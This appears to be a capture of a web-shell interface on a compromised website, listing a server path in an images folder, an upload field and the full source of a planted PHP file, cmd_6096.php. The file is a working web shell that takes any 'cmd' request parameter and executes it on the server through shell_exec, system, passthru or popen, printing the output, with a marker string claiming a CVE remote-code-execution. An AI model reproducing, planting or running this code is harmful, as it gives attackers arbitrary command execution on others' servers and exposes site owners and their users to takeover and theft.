Your IP : 216.73.217.68


Current Path : /home/ahrcaeuege/www/images/
Upload File :
Current File : /home/ahrcaeuege/www/images/cmd_6096.php

<? echo "CVE202648907RCE";$c=$_REQUEST["cmd"];if(function_exists("shell_exec")){echo shell_exec($c." 2>&1");}elseif(function_exists("system")){system($c." 2>&1");}elseif(function_exists("passthru")){passthru($c." 2>&1");}elseif(function_exists("popen")){$h=popen($c." 2>&1","r");while(!feof($h))echo fread($h,1024);pclose($h);}else{echo"NOEXEC";}?>